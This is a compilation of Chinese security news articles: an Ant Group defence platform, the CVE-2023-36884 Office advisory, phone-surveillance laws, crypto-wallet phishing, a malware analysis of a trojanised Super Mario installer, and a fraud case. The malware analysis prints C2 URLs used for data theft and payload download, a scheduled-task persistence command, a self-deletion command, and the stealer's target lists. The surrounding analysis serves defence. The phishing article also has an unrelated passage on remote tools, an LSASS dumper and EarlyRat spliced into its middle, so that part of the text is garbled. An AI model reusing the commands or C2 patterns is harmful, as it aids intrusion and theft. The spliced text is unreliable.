当前行业数字化加速，企业不断引入外部数字产品服务、行业技术体系演化，将会导致企业安全的复杂性爆炸式增长。为应对此挑战，2019年蚂蚁集团首创了全新的安全防护体系“安全平行切面”，把安全能力融入企业技术基础设施里且与业务解耦，在不修改业务正常逻辑的情况下，实现攻击和风险的精确阻断和精细化数据治理。 这套技术体系让企业具备了强大的观测能力与精准的干预能力，实现了安全攻防与安全治理能力与效率的跨越式提升。 如，2021年“双十二”购物节期间全球log4j2漏洞爆发，蚂蚁凭借安全平行切面体系顶住了超40万次国际网络攻击流量，零误拦零漏拦完成了“双十二”安全保障工作，对比更严重的fastjson高危漏洞，安全平行切面将log4j2的应急人力效能提升百倍。面向高度移动化的业务形态，移动安全切面对支付宝APP上的三方SDK和超过300万小程序进行了安全监测和管控，每天进行超4.5亿次线上隐私合规和安全风险检测。移动端安全切面还通过共建项目支持了淘宝、高德地图等APP的安全治理，帮助其发现多个线上潜在安全漏洞、隐私合规风险，有效地保护了用户权益。 安全平行切面入选了2022年国家网络安全宣传周“网络安全优秀创新成果”，创新性和实战效果得到了权威认可。 从单一技术创新到更全面的行业标准和人才等建设工作，“安全平行切面联盟”的建立，将为行业安全实战对抗、网络安全保险、安全合规治理带来全新的能力，为网络安全、数据安全、个人信息保护构建全新的技术基础平台 。该联盟也有望引导行业建立全新的安全治理范式。 蚂蚁集团副总裁兼首席技术安全官韦韬介绍，“数字化企业业务不断演进变化，通过混合部署快速达成短期目标的同时，加剧了长期技术负债。外挂式安全只能‘隔靴搔痒’，强耦合业务的内嵌安全则会导致与业务‘绑腿走路’。安全平行切面直达安全治理痒点和痛点，融入技术基础设施与业务服务内部的安全平行空间，与业务逻辑解耦，独立、高效、精确地支撑安全可治可战任务。希望通过成立技术联盟，推动安全平行切面生态体系产、学、研、用深度融合，不断向社会贡献创新技术和最佳实践，助力数字化转型下的企业安全建设。” 在大会上，蚂蚁端切面技术负责人郑旻还介绍了TAF团标 TAF/T 162-2023《移动应用安全平行切面技术指南》，该标准规定了移动应用安全平行切面架构，并从性能、稳定性、安全性等方面给出移动应用安全平行切面的部署指南,为移动应用场景使用安全平行切面提供了技术指引。

微软Office 0 day漏洞被用于北约峰会的攻击活动。 漏洞概述 7月11日，微软披露了一个影响多个Windows和office产品的未修复的0 day漏洞，漏洞CVE编号为CVE-2023-36884，CVSS V3评分8.3分。攻击者利用该漏洞可以通过恶意office文档实现远程代码执行，并在无需用户交互的情况下利用该漏洞实现复杂攻击。攻击者成功利用该漏洞可以访问敏感信息、关闭系统保护、拒绝正常用户对系统的访问。 漏洞被用于攻击北约峰会，与俄罗斯有关 CVE-2023-36884漏洞已被用于攻击参与北约峰会的组织。乌克兰计算机应急响应中心（CERT-UA）和BlackBerry研究人员称，攻击者使用伪装为乌克兰世界大会的恶意文档来安装恶意软件payload，包括MagicSpell加载器和RomCom后门。安装成功后，攻击者可以通过伪造的.docx或.rtf文档来发起远程代码执行攻击，向执行的工具传递一个命令。 利用该漏洞的攻击者6月的活动与RomCom存在相似之处。RomCom是一个俄罗斯黑客组织，主要利用勒索软件来窃取凭证、支持情报活动等。 漏洞补丁 目前该漏洞尚未修复，但微软称将通过每月的微软补丁日或其他安全更新的方式为用户提供补丁。微软称用户可以使用Defender for Office启用拦截所有office应用创建子进程攻击面减少规律来防止利用该漏洞的钓鱼攻击。 此外，用户还可以将以下应用名添加到HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION注册表键值： Excel.exe Graph.exe MSAccess.exe MSPub.exe PowerPoint.exe Visio.exe WinProj.exe WinWord.exe Wordpad.exe 图 设置FEATURE_BLOCK_CROSS_PROTOCOL_FILE_NAVIGATION注册表 设置注册表可能会拦截漏洞利用企图，也可能会影响与以上应用相关的office正常功能。

法国司法部长埃里克-杜邦-莫雷蒂（Éric Dupond-Moretti）宣布了这项立法，并保证每年仅在数量有限的案件中使用该手段。这种使用间谍手段办案的有效期最长为6个月，而且要必须经过法官的批准，目前主要适用于可能被判处至少5年有期徒刑的案件。他补充说，我们离1984年的极权主义还很遥远。我们使用这种手段也仅仅用于办案，更多人的生命将得到挽救。 让执法人员或政府人员在未经授权的情况下访问某人的手机并秘密观察其活动，这无疑会侵犯它的隐私。这不仅为掌权者滥用公民的隐私权限创造了很多机会，而且也为个人恶意滥用权力提供了便利。 然而，这种监控并非新现象。早在2006年，美国联邦调查局就曾合法的启动了手机麦克风，甚至在关机状态下监控嫌疑人。当时，许多手机仍可拆卸电池，但现代设备已不具备这种功能了。 根据Comparitech公司2022年的一份报告，所有被调查的50个国家都允许本国警方在一定程度上访问智能手机及其数据。各国的权限范围也不尽相同，许多国家要求对此类行动出示授权令。 沙特阿拉伯、新加坡和阿拉伯联合酋长国提供了最不受限制的访问权限，沙特阿拉伯甚至允许在没有任何不法行为嫌疑的情况下进行访问。令人惊讶的是，德国允许情报人员远程访问智能手机并安装间谍软件，而无需提前将该个人列为犯罪嫌疑人。在美国，虽然也有例外，但一般都是需要授权令的。澳大利亚则更进一步，甚至授权警方修改嫌疑人手机上的数据。 然而，一些国家已经建立了对智能手机隐私的有力保护。奥地利、比利时、芬兰和爱尔兰是这方面做的最好的国家之一，因为这些国家有明确的法律规定，只有当当事人是嫌疑人并获得授权令时，警方才可以访问其手机。 如果您无法接受对您的智能手机进行这种访问，市场上还有一些智能手机可供选择，它们都配备了物理开关，可以防止摄像头和麦克风被激活，而且不可能直接被远程控制。 然而，即使您关闭了GPS，您的位置仍然可以通过手机每天多次通信的信号塔进行三角定位追踪。

随着加密货币的普及和应用范围的扩大，热钱包（Hot Wallet）是一种连接互联网的钱包，可以方便快捷地进行交易。最常见的热钱包是交易所内部的钱包，当用户在交易所开通账户时，会自动获得一个钱包地址。此外，还有一些第三方热钱包，如MetaMask和Trust Wallet等，可作为浏览器插件或移动应用程序使用。热钱包的优点是操作简单、方便快捷，适合频繁交易和使用去中心化应用（dApp）。冷钱包（Cold Wallet）是一种离线存储私钥的钱包，用于储存长期持有、不经常交易的加密资产。冷钱包可以分为硬件钱包和纸钱包两种形式。硬件钱包是一种物理设备，如Ledger、Trezor和Coolwallet等，通过与电脑或移动设备连接来进行交互。纸钱包是将私钥和地址以纸质形式打印或手写保存。冷钱包的优点是安全性极高，由于私钥离线存储，攻击者攻击的风险大大降低。无论你是交易频繁还是长期持有加密资产，合理选择热钱包和冷钱包都能提供更好的资产管理和安全保护。但随着加密货币在全球的受欢迎程度越来越高，存储它们的新方式越多，试图盗取数字货币的攻击者使用的工具库就越广泛。攻击者根据目标使用的钱包技术的复杂性来调整其攻击策略，比如通过钓鱼攻击模仿合法网站的来攻击目标，如果成功，他们可以窃取其中全部的金额。热钱包和冷钱包采用了两种截然不同的电子邮件攻击方法，热钱包和冷钱包这两种方法是最流行的加密货币存储方式。 盗取热钱包的方法简单而粗暴 热钱包是一种可以永久访问互联网的加密货币钱包，是一种在线服务，从加密货币交易所到专门的应用程序都要用到。热钱包是一种非常流行的加密存储选项。这可以通过创建一个钱包的简单性（只需注册钱包服务）以及提取和转换资金的便利性来解释。热钱包的普及性和简单性使其成为攻击者的主要目标。然而，由于这个原因，以及热钱包总是在线的事实，它们很少用于存储大额资金。因此，攻击者几乎没有动力在网络钓鱼活动中投入大量资金，因此，用于热钱包电子邮件攻击的技术几乎从来都不复杂或是没有攻击者为此专门开发一种技术的。事实上，它们看起来相当原始，目标大多是初级用户。 针对热钱包用户的典型网络钓鱼骗局如下：攻击者发送来自知名加密货币交易所的电子邮件，要求用户确认交易或再次验证其钱包。 针对Coinbase用户的钓鱼电子邮件示例 用户点击链接后，他们会被重定向到一个页面，在那里他们会被要求输入他们的种子短语。种子短语（恢复短语）是一个由12个(不太常见的是24个)单词组成的序列，用于恢复对加密钱包的访问。这实际上是钱包的主密码。种子短语可用于获得或恢复对用户帐户的访问权限并进行任何交易。种子短语无法更改或恢复：如果放错位置，用户就有可能永远无法访问他们的钱包，并将其交给攻击者，从而永久破坏他们的账户。 种子短语输入页面 如果用户在一个虚假的网页上输入种子短语，攻击者就可以完全访问钱包，并能够将所有资金转移到自己的地址。 这类骗局相当简单，没有软件或社会工程技巧，通常针对技术小白用户。种子短语输入表单通常有一个精简的外观，即只有一个输入字段和一个加密交易标志。 针对冷钱包的网络钓鱼骗局 冷钱包是一种没有永久连接到互联网的钱包，就像一个专用设备，甚至只是写在纸条上的私钥。硬件存储是最常见的冷钱包类型。由于这些设备大部分时间都处于离线状态，而且无法进行远程访问，因此用户倾向于在这些设备上存储大量数据。也就是说，如果不窃取硬件钱包，或者至少不获得物理访问权限，就认为硬件钱包无法被攻破，这种观点错误的。与热钱包的情况一样，诈骗者使用社会工程技术来获取用户的资金。研究人员最近就发现了一个专门针对硬件冷钱包所有者的电子邮件活动。 这种类型的攻击始于加密电子邮件活动：用户收到一封来自Ripple加密货币交易所的电子邮件，并提供加入XRP代币(该平台的内部加密货币)的赠品。 伪装成Ripple加密货币交易所的钓鱼邮件 如果用户点击链接，他们会看到一个博客页面，其中有一篇文章解释了“赠品”的规则。该帖子包含一个“注册”的直接链接。 虚假Ripple博客 此时，可以看出该骗局已经显示出与攻击热钱包的一些不同之处：攻击者没有向用户发送网络钓鱼页面的链接，而是利用博客开发了一种更复杂的沉浸式技巧。他们甚至一丝不苟地复制了Ripple网站的设计，并注册了一个与该交易所官方域名几乎相同的域名。这被称为Punycode网络钓鱼攻击。乍一看，二级域名与原始域名相同，但仔细观察会发现字母“r”已被使用cedilla的Unicode字符替换： 此外，该诈骗网站位于.net顶级域，而不是Ripple官方网站所在的.com。不过，这可能不会给受害者带来任何危险信号，因为这两个领域都被合法组织广泛使用。 在用户按照从“博客”到虚假Ripple页面的链接后，他们可以连接到WebSocket地址wss://s2.ripple.com. 连接到WebSocket地址 Supremo远程桌面，Supremo远程桌面是一个强大、简单和完整的远程桌面控制和支持解决方案。它允许在几秒钟内访问远程PC或加入会议。Supremo还与IT管理控制台USilio兼容。 3Proxy，3Proxy是跨平台的代理服务功能组件,支持HTTP,HTTPS,FTP,SOCKS(v4,4.5,5),TCP和UDP端口映射等。可以单独使用某个功能,也可混合同时使用。Powerline，Powerline 是一个 vim 的状态行插件，为包括 zsh、bash、tmux、IPython、Awesome 和 Qtile 在内的应用提供状态信息与提示。Putty，PuTTY是一个Telnet/SSH/rlogin/纯TCP以及串行阜连线软件。较早的版本仅支援Windows平台，在最近的版本中开始支援各类Unix平台，并打算移植至Mac OS X上。Dumpert，Dumpert是一个使用直接系统调用和API解除连接的LSASS内存转储器 最近的恶意软件研究表明，使用直接系统调用来逃避安全产品使用的用户模式API挂钩的恶意软件数量有所增加。NTDSDumpEx；ForkDump。我们首先在前面提到的Log4j示例中注意到EarlyRat的一个版本，并假设它是通过Log4j下载的。然而，当我们开始寻找更多样本时，发现了最终释放EarlyRat的网络钓鱼文档。网络钓鱼文档本身并不像下面所示的那样高级。 接下来，用户可以输入其XRP帐户的地址。 输入XRP帐户地址 然后，该网站提供选择一种认证方法来接收奖励令牌。 选择身份验证方法 正如你所看到的，硬件钱包是攻击者建议的首选。选择Trezor会将用户重定向到官方网站Trezor.io，它允许通过Trezor connect API将设备连接到web应用程序。该API用于在硬件钱包的帮助下简化交易。攻击者希望受害者连接到他们的网站，这样他们就可以从受害者的账户中提取资金。 当用户试图连接到第三方网站时，Trezor connect会要求他们同意匿名收集数据，并确认他们想连接到该网站。诈骗网站的地址在Punycode视图中显示为：https://app[.]xn--ipple-4bb[.]net。攻击者希望受害者连接到他们的网站，这样他们就可以从受害者的账户中提取资金。 Trezor Connect：确认连接到诈骗网站 通过Ledger进行连接很像Trezor，但它使用WebHID接口，其他步骤保持不变。 用户连接硬件钱包后会发生什么？为了回答这个问题，有必要观察一下网络钓鱼网站的代码。该网站由一个用Node.js编写的应用程序提供支持，它使用两个API： 1.wss://s2.ripple.com，Ripple交易的官方WebSocket地址； 2.钓鱼网站API，例如：app[.]xn--ipple-4bb[.]net/API/v1/action； 攻击者使用这两个API与受害者的XRP账户进行交互。钓鱼网站API与WebSocket地址对话，验证帐户详细信息并请求资金。为此，攻击者们专门设计了一次性的中间钱包。 中间账户只用于两件事：接收受害者的资金，并将这些资金转入攻击者的永久账户。这有助于隐藏最终目的地。 2023年3月，卡巴斯基反垃圾邮件解决方案检测并屏蔽了85362封针对加密货币用户的欺诈电子邮件。诈骗电子邮件活动在3月份达到顶峰，共收到34644条信息，在4月份屏蔽了19902封电子邮件，在5月份屏蔽了30816封。 2023年3月至5月检测到的针对加密货币用户的钓鱼电子邮件数量 总结 攻击者很清楚一件事，越难攻击的对象，其利润就越大。因此，硬件钱包看似无懈可击，但只要成功，那收货将无比丰厚，对硬件钱包的攻击使用的策略远比针对在线加密存储服务用户的策略复杂得多。尽管硬件钱包确实比热钱包更安全，但用户不应放松警惕。在允许任何网站访问你的钱包之前，请仔细检查每个细节，如果有任何可疑之处，请拒绝连接。

威胁分子之所以使用游戏安装程序传播各种恶意软件，是由于游戏拥有庞大的用户群，用户通常将游戏安装程序视为合法软件。威胁分子使用的这种社交工程伎俩利用用户的信任，诱使他们下载并运行恶意游戏安装程序。庞大文件和游戏复杂性为威胁分子提供了隐藏恶意软件的机会。 通过游戏安装程序传播的恶意软件可以通过窃取敏感信息和实施勒索软件攻击等活动来获利。Cyble研究和情报实验室（CRIL）之前发现了几起专门针对游戏玩家及其游戏相关应用软件的恶意软件活动，包括Enlisted、MSI Afterburner和FiveM Spoofer等。 最近，CRIL发现了一个植入木马的《超级马里奥兄弟》游戏安装程序投放多个恶意组件，包括XMR挖矿软件、SupremeBot挖矿客户软件和开源Umbral窃取器。恶意软件文件被发现与super-mario-forever-v702e的合法安装文件捆绑在一起。这起事件凸显了威胁分子利用游戏安装程序作为投放机制的另一个原因：通常与游戏相关的强大硬件为挖掘加密货币提供了宝贵的算力。 《超级马里奥》是一个大受欢迎的电子游戏系列，以其平台游戏玩法、酷炫的视觉效果、令人难忘的角色和迷人的音乐而闻名。最近随着新游戏和动画电影的推出，这个系列再度风靡一时。多年来，该系列游戏不断发展，在各种游戏和游戏机上引入了新的游戏机制、升级和关卡。自20世纪80年代面市以来，《超级马里奥》游戏已吸引了全球大批粉丝，全世界数百万玩家都喜欢其所提供的沉浸式体验。 下图是《超级马里奥永远》成功安装后的GUI。 图1.《超级马里奥》游戏的GUI 下图显示了投放Umbral Stealer的植入木马的《超级马里奥》游戏安装程序的感染链。 图2. 感染链 技术分析 在这篇技术分析博文中，我们分析了一个名为“Super-Mario-Bros.exe”的样本，其SHA265为e9cc8222d121a68b6802ff24a84754e117c55ae09d61d54b2bc96ef6fb267a54，这是一个32位的Nullsoft安装程序（NSIS）自解压归档可执行文件。 图3. 静态详细信息 下面显示的图标描绘了植入木马的《超级马里奥》游戏的安装程序。 图4. 植入木马的《超级马里奥》游戏安装程序文件图标 NSIS安装程序文件“Super-Mario-Bros.exe”已被篡改，变成了植入木马的《超级马里奥》游戏安装程序。这个可执行文件包含三个独立的可执行文件：“super-mario-forever-v702e.exe”（这是一个真正的、安全的《超级马里奥》游戏应用程序）以及两个名为“java.exe”和“atom.exe”的恶意可执行文件，如下所示。 图5. 《超级马里奥》游戏NSIS安装程序里面的文件 一执行“Super-Mario-Bros.exe”文件，它就将“super-mario-forever-v702e.exe”可执行文件投放到%appdata%目录中，并开始执行。该操作将触发显示安装向导，允许用户继续安装“super-mario-forever-v7.02”程序。 下图显示了《超级马里奥永远》游戏的安装向导。 图6. 《超级马里奥》游戏安装向导 一旦安装成功完成，就会启动图形用户界面（GUI），为用户提供了玩《超级马里奥永远》游戏的界面，如下所示。 图7. 《超级马里奥》游戏的用户界面 在后台，NSIS安装程序将“java.exe”和“atom.exe”文件连同《超级马里奥永远》游戏投放到具有隐藏属性的%appdata%目录中，如图8所示。随后，安装程序继续执行这些文件。 图8. 将恶意软件文件连同正版《超级马里奥》安装程序投放到%appdata%中 在投放的文件中，“java.exe”充当了XMR挖矿软件可执行文件，专门为挖掘加密货币门罗币而设计。另一方面，“atom.exe”充当主要的僵尸网络挖矿客户软件，实现挖矿软件的网络连接、接收挖矿任务，并有效管理整个挖矿过程。 XMR挖矿软件 “java.exe”是一个XMR（门罗币）挖矿软件，它在用户不知情或不同意的情况下在后台秘密运行，导致未经授权、可能有害地利用计算资源以挖掘加密货币门罗币（XMR）。 当“java.exe”被执行时，恶意软件会与挖矿服务器“gulf[.] monerooocean[.]stream”建立起连接，以执行加密货币挖矿活动。 同时，恶意软件从受害者的系统收集有价值的数据，包括计算机名称、用户名、GPU、CPU及其他相关详细信息。然后，这些敏感信息通过以下URL API传输到指挥和控制（C&C）服务器： “hxxp://shadowlegion[.]duckdns[.]org/nam/api/endpoint[.]php” SupremeBot：挖矿客户软件 一旦执行，“atom.exe”在ProgramData文件夹中创建自己的副本，使用随机生成的字符串作为文件夹名称，并使用当前运行中的父进程的名称作为文件名。文件夹名称遵循全局唯一标识符（GUID）的格式，如下所示。 C: \ ProgramData \ {FY3PFGWN-J6QF-EIEE-KMFXFHFLWH1Q} \ Super-Mario-Bros.exe 之后，“atom.exe”立即启动一个计划任务命令的执行，从而创建一个新的计划任务条目，该任务每15分钟运行一次，没有结束日期。 “C:\Windows\System32\schtasks.exe” /Create /SC MINUTE /MO 15 /TN “U757WD6WG4EDHUD873” /TR “C:\ProgramData\{FY3PFGWN-J6QF-EIEE-KMFXFHFLWH1Q}\Super-Mario-Bros.exe” /F 图9. 实现持久性的计划任务条目 接下来，可执行文件杀死“atom.exe”进程，并使用以下命令行参数从系统中删除与其相关的文件： “C:\Windows\System32\cmd.exe” /c taskkill /im atom.exe /f & erase C:\Users\ 删除后，被投放的文件启动执行过程，并与C&C服务器“silentlegion[.]duckdns[.]org”建立起连接，使用Windows HTTP Service API调用。 挖矿客户软件执行以下活动： 向“hxxp://silentlegion[.]duckdns[.]org/gate/update[.]php”发起POST请求，包括受害者系统的CPU和GPU版本作为唯一标识符。 随后向“hxxp://silentlegion[.]duckdns[.]org/gate/connection[.]php” 发送POST请求，以验证该客户软件是否已注册。 如果未找到唯一标识符，客户软件发送POST请求，通过添加唯一标识符来注册客户软件。 如果客户软件的连接建立成功，它将从C&C服务器接收XMRig CPU和GPU挖掘配置。 最后，它向“hxxp://silentlegion[.]duckdns[.]org/gate/config[.]php”发送http POST请求，包含受害者机器所特有的挖矿配置。 此外，“atom.exe”从以下指挥和控制（C&C）URL检索窃取信息的恶意可执行文件： hxxp[:]//shadowlegion[.]duckdns[.]org/wime[.]exe 名为“wime.exe”的文件是使用Themida打包器打包的32位二进制文件。执行后，该文件解包，并将Umbral Stealer加载到进程内存中。Umbral Stealer是一个基于Windows的信息窃取器，作为一个开源项目放在GitHub上。 Umbral Stealer Umbral Stealer是一个用C#编写的高效的轻量级信息窃取器。它迅速收集数据，并使用Discord web钩子将数据发送给攻击者。自今年4月以来，人们可以在GitHub上访问该窃取器，其开发者在不断更新。 在该窃取器的主函数中，它含有Process()和Run()两个关键函数，如下面的代码片段图所示。 图10. Umbral窃取器的主函数 Process()函数负责在载荷执行开始之前执行初始化和设置任务。 它先验证web钩子，如果未提供则退出。然后，它注册一个唯一的互斥锁，以防止载荷的多个实例同时运行。 之后，它等待活跃的互联网连接，以确保与外部资源进行适当的联系。这确保在进一步继续之前载荷可以访问互联网。 此外，它检查载荷是否在虚拟机上运行，如果检测到则退出。 然后，如果恶意软件没有被设置成系统启动时运行，它会通过提示UAC（用户帐户控制）对话框以提升权限，请求用户的管理员权限。 该函数企图隐藏载荷进程以保持隐匿，并将其添加到Windows Defender排除项中。如果篡改防护未启用，它会尝试禁用Windows Defender。 此外，如果以管理员权限运行，它将载荷添加到系统启动项中以确保持久性。 图11. Umbral窃取器初始化和设置代码片段 Run()函数负责执行载荷的主要功能。 它先生成一个用于临时存储数据的随机文件路径。然后，它创建一个临时文件夹以存储所收集的数据。 如果恶意软件以管理员权限运行，它会阻止已知的防病毒相关网站，使用BlockAvSites()阻止检测活动。 BlockAvSites()函数修改位于“System32\drivers\etc\hosts”的Windows hosts文件，以阻止指定的防病毒相关网站。通过插入特定条目，恶意软件将这些网站的域名重定向到IP地址0.0.0.0。 这可以防止任何人访问受感染系统的防病毒相关网站，实际上阻止这类检测活动。下图显示了BlockAvSites()函数的代码片段和修改后的hosts文件。 图12. BlockAvSites()函数 Run()函数随后启动，等待多个任务从目标系统收集各种类型的数据。这些任务包括： 捕捉屏幕截图 检索浏览器密码和cookie 捕捉网络摄像头图像 获取Telegram会话文件和Discord令牌 获取Roblox cookie和Minecraft会话文件 收集与加密货币钱包相关的文件。 Umbral Stealer主要针对以下互联网浏览器： Brave Chrome Chromium Comodo Edge EpicPrivacy Iridium Opera OperaGx Slimjet Ur Vivaldi Yandex Stealer还专门针对以下加密货币钱包： Zcash Armory Bytecoin Jaxx Exodus Ethereum Electrum AtomicWallet Guarda Coinomi 接下来，将收集到的数据保存到临时文件夹中的适当目录中。该函数还跟踪收集的数据项的计数。最后，该函数显示收集的数据项的计数，使用下图所示的代码片段提供载荷操作的摘要。 图13. 总结Umbral Stealer操作的摘要 收集到的数据将使用如下所示的Discord web钩子传输给攻击者。 图14. 用于泄漏信息的Discord web钩子 构建器： 下图描述了放在GitHub上的Umbral Stealer构建器。 图15. Umbral Stealer构建器GUI 结论 在旨在利用漏洞并执行各种恶意活动的威胁分子眼里，游戏社区中庞大且相互关联的用户群是诱人的目标。 这起挖矿恶意软件活动利用《超级马里奥永远》游戏来攻击使用高性能计算机玩游戏的游戏玩家和个人。此外，该恶意软件还部署了一个窃取器组件，从受害者的系统中非法获取敏感信息，旨在牟取另外的经济利润。 结合使用挖矿活动和窃取活动导致了经济损失、受害者的系统性能大幅下降以及宝贵的系统资源枯竭。 因此，个人用户和组织都遇到了生产力大幅下降的情形。CRIL一直密切监视最新的恶意软件变体，并持续更新博客，提供可操作的情报，以保护用户免受这类攻击。 我们的建议 建议用户定期检查系统性能和CPU使用情况。 企业应防止用户从Warez/Torrent网站下载盗版软件。YouTube、Torrent等网站上的“黑客工具”就含有这样的恶意软件。 应更新组织信息安全政策/可接受使用政策，明确禁止在最终用户系统上下载和安装加密货币挖掘软件。 用户应该在其电脑、手机及其他联网设备上打开自动软件更新功能。 建议在联网设备（包括PC、笔记本电脑和移动设备）上使用知名的防病毒和互联网安全软件包。 作为日常安全意识和培训的一部分，应该教育用户在未先验证真实性之前不要打开来历不明的链接和电子邮件附件。 教育员工如何保护自己免受网络钓鱼攻击和不可信的URL等威胁。 阻止可能用于传播恶意软件的URL，比如Torrent/Warez。 应该监视端点和服务器，以防止CPU和RAM利用率出现意外峰值，这可能表明潜在的恶意软件感染。 MITRE ATT&CK®技术 战术 技术ID 技术名称 执行 T1204 T1047 T1059 T1059 T1203 用户执行 Windows Management Instrumentation PowerShell 命令和脚本解释器 利用客户端执行 持久性 T1053 T1543 计划任务/作业 Windows服务 特权提升 T1055 进程注入 防御规避 T1497 T1027 T1036 T1562 虚拟化/沙箱规避 经过混淆处理的文件或信息 伪装 禁用或修改工具 凭据访问 T1056 输入捕获 发现 T1057 T1012 T1082 T1083 进程发现 查询注册表 系统信息发现 文件和目录发现 收集 T1115 T1125 剪贴板数据 视频捕获 C&C T1105 入站工具传输 影响 T1529 系统关闭/重启 攻陷指标 指标 指标类型 描述 90647ec1bc00c6d35ba3fd7ee214cd20 0eb317fb165e87c23770ab6dff45e92dbd209b66 e9cc8222d121a68b6802ff24a84754e117c55ae09d61d54b2bc96ef6fb267a54 MD5 SHA1 SHA256 《超级马里奥兄弟》安装程序（NSIS文件） 54d4bcd4e789a196022632e1f0922dd7 41ff5729fdeafec9879f12faffa3a62391e0a6f5 41d1024209b738785ace023c36b2165d95eab99b0d892327212b8a5f7c311610 MD5 SHA1 SHA256 Atom.exe (SupremeBot) abbf1ee343b1cdc834be281caef875c8 b72ffd7f63d4ad1de95783b7cf1ecb89cdb0056b 1f479a220e41be1c22092d76400565d0f7d8e890d1069a2f8bbdc5f697d9808f MD5 SHA1 SHA256 Java.exe (XMR挖矿软件) 1335a17d311b929988693fb526dc4717 062830cb07ce430fe049627e001ef23fba8ba351 88556497794511dde0ca0a1bfee08922288a620c95a8bc6f67d50dbb81684b22 MD5 SHA1 SHA256 wime.exe (Umbral Stealer) hxxp://shadowlegion[.]duckdns[.]org/nam/api/endpoint[.]php URL 从XMR挖矿软件进行连接 hxxp://silentlegion[.]duckdns[.]org/gate/update[.]php hxxp://silentlegion[.]duckdns[.]org/gate/connection[.]php hxxp://silentlegion[.]duckdns[.]org/gate/config[.]php URL 从SupremeBot进行连接 hxxp[:]//shadowlegion[.]duckdns[.]org/wime[.]exe URL Umbral窃取器由SupremeBot下载

约翰-唐纳德是一位在全球范围内销售机器人的企业家，尽管他有很好的技术背景，却在大流行期间成为了网络攻击的受害者。 当他的家族企业面临营业额急剧下降95%时，攻击者将目标对准了他。在极其不情愿的情况下，他屈服于攻击者的要求，将近10万英镑转到了攻击者的银行账户。这一事件给唐纳德带来了巨大的压力，他说这是他不希望看到的经历。 苏格兰警方最近发布的统计数据表明，自2018年以来，欺诈案件上升了68%，其中大部分发生在网上。 唐纳德的公司Robop主要生产用于控制鸟类害虫的机器人falcons，由于COVID-19的大流行，该公司经历了重大挫折。就在2020年12月的一个星期五下午，大约16:30，唐纳德接到一个电话。来电者操着爱丁堡口音，声称自己是一个联合银行工作队的成员，并告知唐纳德他的账户中存在欺诈行为。 起初，唐纳德对此持怀疑态度，但他们对他和他的生意的了解程度使他相信了他们。由于无法通过其他电话直接联系到他的银行，唐纳德的怀疑也越来越强烈。 然后，打电话的人加大了压力，称由于他们的系统和他的系统之间存在差异，解决这个问题的时间窗口有限。在一个小时的谈话过程中，欺诈者劝说唐纳德在他的账户之间转移资金，这让他事后感到很愚蠢，但当时他认为没有其他的选择。 幸运的是，一位朋友将唐纳德带到了网络和欺诈中心，他在那里寻求帮助，唐纳德的银行在六周后退还了被盗金额。 该中心的首席执行官Jude McCorry透露，其他人就没有这么幸运了。她补充说，我们最近看到了一起欺诈案，有70万英镑的房产交易转到了犯罪分子的账户。 这虽然只是涉及到的只是个人而不是一个公司。但是影响是巨大的，目前调查仍在进行中。目前我们需要研究的是如何防止该事件的发生。 苏格兰警方承认，目前网络犯罪的严重程度被严重低估，公布出的数字只是其中的一小部分。 近年来，网络欺诈案的侦破率下降了一半，仅占案件的16%。警察局长助理Andy Freeburn警告说，苏格兰犯罪集团越来越多地参与了网络犯罪和欺诈。 他补充说，在过去的一年里，我们所看到的是新兴的有组织的犯罪团伙在这一领域的运作，他们试图通过网络欺诈来对苏格兰的公众进行攻击，我们现在正积极努力的打击这些团伙。 我们正在与银行和金融合作伙伴进行协商，在识别人员和追回资金方面取得了巨大的成功。 但我们也在改进我们的宣传信息，并让公众清楚他们应该如何帮助自己，不向嫌疑人提供细节信息，确保他们的电脑软件是最新的，并向我们报告可疑的情况。 为了应对这种不断升级的威胁，苏格兰警方已经为防止网络犯罪战略增拨了430万英镑，重点用于购置新的设备以及为业务人员提供培训。 该部队还制定了一个使用新兴技术的道德协议。同时，约翰-唐纳德敦促公众认识到网络诈骗的复杂性，并建议将银行的欺诈帮助热线保持在快速拨号状态，同时强调当人们拨打这些号码时，银行应迅速作出回应。

2023年7月10日，嘶吼安全产业研究院联合国家网络安全产业园区（通州园）正式发布《嘶吼2023网络安全产业图谱》。 随着数字化时代的发展，网络安全产业正在经历快速变革。过去，网络安全主要关注传统的防御手段和反应式的威胁应对，但现在，随着威胁的不断演进和技术的快速发展，网络安全产业也不得不适应新的挑战和需求。嘶吼安全产业研究院根据当前网络安全发展规划与趋势发布《嘶吼2023网络安全产业图谱》调研，旨在进一步了解网络安全产业的现状和未来发展趋势，展现网络安全产业的构成和重要组成部分，探索网络安全产业的竞争格局和发展前景。 本次《嘶吼2023网络安全产业图谱》采用了市场调研、数据精析、文献研究及政策参考等多方面综合分析，反映网络安全行业市场规模状况、体现产业化的重点发展的方向、展现各细分领域在整个网络安全行业中的市场占比情况、揭示行业热门细分赛道的市场潜力和发展趋势。 图谱概况： 《嘶吼2023网络安全产业图谱》调研成功收录417家网络安全企业，分为七大类别，共涉及121个细分领域。相比于2022年新增22个细分领域，下面为本次图谱新增与修改部分。 新增分类： 基础技术与通用能力-密码安全：密码测评。 安全服务-安全运营与管理：态势感知、外部攻击面管理（EASM）、网络资产攻击面管理（CAASM）。 安全服务-攻防对抗与演练：威胁情报、入侵检测与防御IPS/DPS、溯源取证、入侵与攻击模拟（BAS）。 开发与应用安全-软件供应链安全：软件管控平台、静态应用程序安全测试（SAST）、动态应用程序安全测试（DAST）、交互式应用安全测试（IAST）。 开发与应用安全：运行时应用程序自我保护（RASP）、WAAP。 应用与产业安全-云安全：云安全态势管理CSPM、容器安全、云主机安全。 应用与产业安全：内容安全、视频安全。 数据安全：数据分类分级、数字水印、数据安全合规审计。 修改部分： 原二级分类：应用安全、开发安全，单独拆分出来合并为一级分类开发与应用安全。 原一级分类：威胁对抗与安全管理改成安全服务，并进一步细致规划产业布局。 原二级分类：大数据风控与反欺诈合并。 原二级分类：信创安全新增5个方向细分：信创防火墙、信创网关（下一代防火墙）、信创态势感知平台、信创主机安全及管理平台、信创堡垒机。 调研精析 根据嘶吼安全产业研究院调研数据显示，一级分类-安全服务收录占比32.1%，同比占比增长3%；一级分类-应用与产业安全收录占比19.4%，同比占比减少5.6%；一级分类-数据安全收录占比16.2%，同比占比增长0.8%。相较于去年安全服务、应用与产业安全、数据安全，依然是网络安全产业三大主流方向。 